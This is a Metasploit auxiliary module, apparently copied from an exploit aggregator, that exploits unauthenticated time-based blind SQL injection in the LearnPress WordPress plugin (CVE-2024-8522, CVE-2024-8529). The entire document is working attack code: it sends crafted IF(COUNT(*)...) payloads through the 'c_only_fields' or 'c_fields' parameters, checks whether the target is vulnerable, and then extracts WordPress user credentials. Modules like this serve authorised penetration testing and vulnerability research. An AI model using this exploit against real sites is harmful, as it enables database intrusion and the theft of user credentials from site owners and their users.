Share
## https://sploitus.com/exploit?id=MSF:AUXILIARY-SCANNER-HTTP-WP_LEARNPRESS_C_FIELDS_SQLI-
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Auxiliary
  include Msf::Auxiliary::Scanner
  include Msf::Exploit::Remote::HTTP::Wordpress
  include Msf::Exploit::Remote::HTTP::Wordpress::SQLi

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'WordPress LearnPress Unauthenticated SQLi (CVE-2024-8522, CVE-2024-8529)',
        'Description' => %q{
          The LearnPress WordPress LMS Plugin up to version 4.2.7 is vulnerable to SQL injection via
          the 'c_only_fields' and 'c_fields' parameters. This allows unauthenticated attackers to exploit blind SQL injections
          and extract sensitive information.
        },
        'Author' => [
          'abrahack',                              # Vulnerability Discovery
          'Valentin Lobstein',                     # Metasploit Module
          'Achref Ben Thameur a.k.a achrefthameur' # Help for CVE-2024-8529 reproduction
        ],
        'License' => MSF_LICENSE,
        'References' => [
          ['CVE', '2024-8522'],
          ['CVE', '2024-8529'],
          ['URL', 'https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/learnpress/learnpress-wordpress-lms-plugin-427-unauthenticated-sql-injection-via-c-only-fields'],
          ['URL', 'https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/learnpress/learnpress-wordpress-lms-plugin-427-unauthenticated-sql-injection-via-c-fields']
        ],
        'Actions' => [
          ['CVE-2024-8522', { 'Description' => 'SQL Injection via c_only_fields parameter' }],
          ['CVE-2024-8529', { 'Description' => 'SQL Injection via c_fields parameter' }]
        ],
        'DefaultAction' => 'CVE-2024-8522',
        'DefaultOptions' => { 'SqliDelay' => '2', 'VERBOSE' => true },
        'DisclosureDate' => '2024-09-11',
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'SideEffects' => [IOC_IN_LOGS],
          'Reliability' => []
        }
      )
    )

    register_options [
      OptInt.new('COUNT', [false, 'Number of rows to retrieve', 1]),
    ]
  end

  def run_host(_ip)
    if action.name.downcase.include?('cve-2024-8529')
      sqli_param = 'c_fields'
      description = 'CVE-2024-8529'
      path = '/wp-json/lp/v1/courses/archive-course'
      additional_params = { 'return_type' => 'json' }
    else
      sqli_param = 'c_only_fields'
      description = 'CVE-2024-8522'
      path = '/learnpress/v1/courses'
      additional_params = {}
    end

    print_status("Performing SQL injection for #{description} via the '#{sqli_param}' parameter...")

    @sqli = create_sqli(dbms: MySQLi::TimeBasedBlind) do |payload|
      random_negative_number = -Rex::Text.rand_text_numeric(2).to_i
      vars_get = { sqli_param => "IF(COUNT(*)!=#{random_negative_number},(#{payload}),0)" }.merge(additional_params)

      vars_get['rest_route'] = path if action.name.downcase.include?('cve-2024-8522')

      res = send_request_cgi({
        'method' => 'GET',
        'uri' => normalize_uri(target_uri.path, path),
        'vars_get' => vars_get
      })

      fail_with(Failure::Unreachable, 'Connection failed') unless res
    end

    fail_with(Failure::NotVulnerable, 'Target is not vulnerable.') unless @sqli.test_vulnerable
    print_good('Target is vulnerable to SQLi!')

    wordpress_sqli_initialize(@sqli)
    wordpress_sqli_get_users_credentials(datastore['COUNT'])
  end
end